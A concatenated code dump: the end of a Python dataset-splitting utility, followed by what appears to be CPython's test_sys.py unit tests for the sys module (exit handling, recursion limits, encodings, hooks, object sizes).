for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
if __name__ == '__main__':
# augment_hsv() requires an image argument; use a small synthetic BGR frame as a smoke test.
augment_hsv(np.full((64, 64, 3), 114, dtype=np.uint8))
|
test_sys.py
|
import unittest, test.support
from test.support.script_helper import assert_python_ok, assert_python_failure
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
import gc
import sysconfig
import locale
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@test.support.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated",
"dev_mode", "utf8_mode")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# has no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = test.support.with_pymalloc() # module is imported as test.support above
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
@test.support.requires_type_collecting
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
@test.support.requires_type_collecting
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
